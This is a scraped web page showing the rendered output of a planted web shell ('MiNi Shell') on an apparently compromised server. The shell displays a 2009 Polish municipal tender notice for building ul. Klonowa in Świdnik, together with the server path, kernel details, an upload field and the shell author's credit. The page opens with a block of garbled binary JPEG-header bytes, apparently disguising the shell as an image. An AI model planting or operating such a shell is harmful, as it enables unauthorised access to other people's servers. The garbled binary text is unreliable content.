JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090127/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090127/10134-N-2009.html

<p class="kh_header"><b>Świdnik: Budowa ul.Klonowej w Świdniku wraz z infrastrukturą towarzyszącą (I i II etap)</b><br>
<b>Numer ogłoszenia: 10134 - 2009; data zamieszczenia: 27.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska  Świdnik , ul. Kard. St. Wyszyńskiego 15, 21-040 Świdnik, woj. lubelskie, tel. (081) 468 66 25, faks 081 751 76 08.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.swidnik.tensoft.pl.</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa ul.Klonowej w Świdniku wraz z infrastrukturą towarzyszącą (I i II etap).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem inwestycji jest budowa ulicy Klonowej położonej w południowej części 
miasta w zabudowie wielorodzinnej.
Wg Miejscowego Planu Zagospodarowania Przestrzennego miasta Świdnik, ulica Klonowa 
jest drogą klasy L. Dla tej klasy prędkość projektowa V0=40 km/h.
Budowa ulicy obejmuje:
a)budowę jezdni od Al. Lotników Polskich (km 0+0005,26) do ul. Kusocińskiego 
(km 1+819,4) o szerokości 5,50 m dla odcinka ulicy od. Al. Lotników Polskich 
do ul. Ratajczaka jako minimalną do poprowadzenia potoków dwukierunkowego ruchu z udziałem samochodów ciężarowych; z poszerzeniami na łukach, ale bez zastosowania jednostronnych przechyłek jezdni, przy prędkości 30 km/h oraz dla odcinka od ul. Ratajczaka do ul. Kusocińskiego szerokość 6,00 m	w związku z 
przyjęciem założenia okresowego oddania tej ulicy dla zwiększonego ruchu przy 
prędkości projektowej 40 km/h, z poszerzeniami na łukach, również bez zastosowania przechyłek jednostronnych jezdni.
b)budowę parkingu ogólnodostępnego po stronie lokalizacji Kościoła ( wjazd w km 1+390,1; wyjazd w km 1+495,5) dla samochodów osobowych (72 stanowiska, w tym 68 ukośnych pod kątem 60°.
c)przebudowę istniejących parkingów ze stanowiskami prostopadłymi do osi ulicy na parkingi ze stanowiskami ukośnymi (76 stanowisk pod kątem 60°).
d)budowę nowych odcinków chodników przyległych do jezdni dla pieszych po obu stronach ulicy o szerokości 2,00 m z lokalnymi dojściami do posesji (w miejscach dotychczasowych urządzonych dojść) oraz wzdłuż ulic bocznych na odcinkach o długości do 20 m oraz budowę chodników, oddalonych od jezdni o szerokość 1,5 m i przebudowa chodników istniejących o szerokości 2,5 m.
e)przebudowę istniejących i budowę nowych zjazdów publicznych w granicach pasa ulicznego,
f)przebudowę istniejących i budowę nowych zjazdów indywidualnych (bramowych) w granicach pasa ulicznego,
g)budowę oświetlenia ulicznego:
- linie oświetleniowe kablami YAKY 5x35 mm, 
- zabezpieczenie projektowanych kabli przy przejściach przez ulice (Arot SRS 75), 
- zabezpieczenie skrzyżowań kabli z istniejącym i projektowanym uzbrojeniem 
	  (rura A 75),  
- usunięcie kolizji z istniejącymi sieciami elektroenergetycznymi,
- słupy oświetleniowe aluminiowe okrągłe, anodowane na kolor czarny typu 
   SAL-10,3 , rozstaw słupów średnio co 30 m, w ul. Ratajczaka co 40 m,
- wysięgniki jednoramienne aluminiowe typu WR-8a w = 1m, w = 1m
- wysięgniki dwuramienne aluminiowe typu WR-5a w = 1m, w = 1m (nr 9/2 i 
  11/2 -	 słupy oświetlające parking)
- oprawy uliczne LUNOIDA S-250
- źródło światła sodowe SON-T-PLUS 150W, SON-T-PLUS 250W
h)budowę kanalizacji sanitarnej:
- kanał sanitarny  l =  963,0 m (Dn 200)
- odgałęzienia l =  209,0 m
 ogółem długość kanalizacji L = 1 172,0 m
- studnie kanalizacyjne Dn 1200 mm - szt. 37
- studnie kanalizacyjne inspekcyjne Dn 300 mm - szt. 28
i)budowę kanalizacji deszczowej,
- kanał deszczowy L = 2 653,5 m (Dn 250 - 600 wraz z przykanalikami Dn 200)
- studnie kanalizacyjne prefabrykowane Dn 140 - szt. 55
- studnie kanalizacyjne prefabrykowane Dn 120 - szt. 53
- wpusty deszczowe  50 cm (pojedyncze) - szt. 156
- wpusty deszczowe  50 cm (podwójne) - szt. 8
j)przebudowę sieci teletechnicznej TP S.A. i NETIA S.A.
Przebudowa sieci telefonicznej Netia S.A.:
-  budowa kanalizacji kablowej - 235,0 m      km/otw. -  0,905
-  budowa rurociągu kablowego 4xRHDPE 32 - 217,5 m   
-  zabezpieczenie kanalizacji kablowej i kabli rurami dwudzielnymi - 172,5 m
-  budowa kabli telefonicznych kanałowych - 905,0 m      km/par  -  106,28
Przebudowa sieci telefonicznej TP S.A.:
-  budowa kanalizacji kablowej - 104,5 m       km/otw. -  0,145
-  zabezpieczenie kanalizacji kablowej - 188,5 m
-  budowa kabli telefonicznych kanałowych - 358,0 m       km/par  - 18,94
-  demontaż telefonicznej linii napowietrznej - 95 m
k)budowę sieci wodociągowej:
- z rur PE100 SDR11 PN 12,5, 160/14,6, odcinek o długości 517m,
- z rur PE100 SDR11 PN 12,5, 125/11,4, odcinek o długości 74m,
- z rur PE100 SDR11 PN 12,5, 160/14,6, odcinek o długości 132m,
- z rur PE100 SDR11 PN 12,5, 125/11,4, odcinek o długości 63m,
- z rur PE100 SDR11 PN 12,5, 110/10,0, odcinek o długości 108m,
Łączna długość projektowanego rurociągu L = 894m.
l)budowę kolektora kanalizacji deszczowej w ul. Kusocińskiego,
- kanał deszczowy  1200 l = 369,0 m
- kanał deszczowy  400 l = 15,0 m
- studnia żelbetowa 3,0 x 2,4 (włączenie do proj. KD 1800) szt. 1
- studnia żelbetowa 4,0 x 2,4 (połączenie z kanałem 1200) szt. 1
- studnie Dn 180 szt. 5

Na budowę oświetlenia ulicznego wraz z usunięciem kolizji, kanalizacji sanitarnej, kanalizacji deszczowej, przebudowę sieci teletechnicznej, budowę sieci wodociągowej oraz kolektora kanalizacji deszczowej w ul. Kusocińskiego opracowano odrębne projekty branż.

Szczegółowy opis przedmiotu zamówienia oraz wymagania techniczne określone zostały w niniejszej SIWZ, w załączniku nr 5 - Specyfikacje techniczne wykonania i odbioru robót budowlanych.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.30.00-9, 45.11.10.00-8, 45.23.10.00-5, 45.23.20.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 140000 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
a)posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
b)posiadają niezbędną wiedzą i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonywania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,  
c)znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
d)nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2,  

Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana wg formuły spełnia/nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych z dnia 29 stycznia 2004 r. (t.j.Dz. U. z 2007 r. Nr 223, poz. 1655 z późn. zm.) (zgodnie z zał. nr 5 do wniosku) 

Dokumenty potwierdzające spełnianie warunków wymaganych od oferentów.
Wykonawca składa następujące dokumenty:
1.W celu potwierdzenia, że wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień oraz nie podlega wykluczeniu na podstawie art. 24 ustawy Prawo zamówień publicznych z dnia 29 stycznia 2004 r. (t.j.Dz. U. z 2007 r. Nr 223, poz. 1655 z późn. zm.) do wniosku należy załączyć  następujące dokumenty:
a)Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
b) Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
c) Aktualne zaświadczenie właściwego naczelnika oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
d) Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 
e) Aktualna informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2.W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzą i doświadczenie 
oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonywania 
zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów do 
udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia , 
do oferty należy załączyć następujące dokumenty: 
a) Wykaz wykonanych robót budowlanych ( wybudowanie,przebudowanie  - dróg , ulic o nawierzchni bitumicznej ) w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia z podaniem ich wartości oraz daty i miejsca wykonania oraz załączyć dokumenty potwierdzające, że roboty te zostały wykonane należycie; (zgodnie z zał. nr 4A do wniosku). 
Wykonawca musi wykazać, że wykonał (wybudował, przebudował)  inwestycje branży drogowej( drogi ,ulice) o nawierzchni bitumicznej  o łącznej powierzchni co najmniej 40000 m2 dla maksimum trzech wybranych inwestycji. 
b)Dokumenty potwierdzające, że w/w roboty budowlane zostały wykonane należycie.
c) Wykaz wykonanych robót budowlanych (wybudowanie ,przebudowanie -  ulic, parkingów, chodników o nawierzchni z kostki wibroprasowanej ) w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia z podaniem ich wartości oraz daty i miejsca wykonania oraz załączyć dokumenty potwierdzające, że roboty te zostały wykonane należycie; (zgodnie z zał. nr 4B do wniosku) 
Wykonawca musi wykazać, że wykonał (wybudował, przebudował)  inwestycje branży drogowej (ulice, parkingi, chodniki) o nawierzchni z kostki betonowej wibroprasowanej o łącznej powierzchni co najmniej 15 000 m2 dla maksimum trzech wybranych inwestycji. 
d)Dokumenty potwierdzające, że w/w roboty budowlane zostały wykonane należycie.
e) - Wykaz osób , którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności; (zgodnie z zał. nr 2 do wniosku)  
Jeżeli w wykazie , o którym mowa powyżej  , wykonawca wskazał osoby , którymi będzie dysponował ,a które nie są zatrudnione u niego , należy dołączyć do wykazu pisemne zobowiązanie innych podmiotów do udostępnienia tych osób zdolnych do wykonania zamówienia , 
f)Dokumenty stwierdzające, że co najmniej jedna z osób (dotyczy wykonania robót budowlanych), które zostały wymienione w wykazie osób i podmiotów (zał. nr 3 do wniosku), które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia budowlane tj. uprawnienia branży drogowej, elektrycznej, sanitarnej i zaświadczenia o wpisie do okręgowej Izby Inżynierów Budownictwa.
Wymagane uprawnienia wraz z odpowiednimi zaświadczeniami o wpisie do Okręgowej Izby Inżynierów Budownictwa powinny posiadać osoby (dla każdego uprawnienia oddzielnie lub łącznie)
g)wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi dysponuje lub będzie dysponował wykonawca .Wykonawca musi dysponować lub  będzie dysponował niżej wymienionym sprzętem niezbędnym do wykonania zamówienia: 
- walec wibracyjny samojezdny - 2 sztuki
- walec ogumiony samojezdny o ciężarze minimum 10 ton - 1 sztuka
- rozkładarka masy bitumicznej z możliwością układania szerokością 6 m - 1 sztuka 
Jeżeli w wykazie , o którym mowa powyżej  , wykonawca wskazał narzędzia i urządzenia , którymi będzie dysponował ,a które nie są jego własnością , należy dołączyć do wykazu pisemne zobowiązanie innych podmiotów do udostępnienia tych niezbędnych do wykonania zamówienia narzędzi i urządzeń, 
3. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów o których mowa w:
3.1. w pkt. 1. ppkt. a,b,c,e  - składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że:
a)   nie otwarto likwidacji ani nie ogłoszono upadłości,
b) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
3.2. w pkt. 1 ppkt. d - składa zaświadczenie właściwego organu sądowego lub 
administracyjnego kraju pochodzenia albo zamieszkania osoby , której dokumenty dotyczą , w zakresie określonym w art. 24 ust. 1 pkt. 4-8 ustawy	
4. Dokumenty, o których mowa w pkt. 3.1 lit. a i c oraz pkt. 3.2., powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument, o którym mowa w pkt. 3.1 lit. b, powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
5.  Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. 3, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Dotyczy to również pkt. 4.

9.4 Inne  dokumenty, których złożenie jest wymagane od wszystkich wykonawców  biorących udział w prowadzonym postępowaniu :
a)Wypełniony formularz wniosku ,.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p><br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.swidnik.tensoft.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Świdnik , 21-040 Świdnik ul.Kard.St.Wyszyńskiego 15 , pok. 218.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.02.2009 godzina 13:00, miejsce: Urząd Miasta Świdnik , 21-040 Świdnik ul.Kard.St.Wyszyńskiego 15 , pok. 105.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com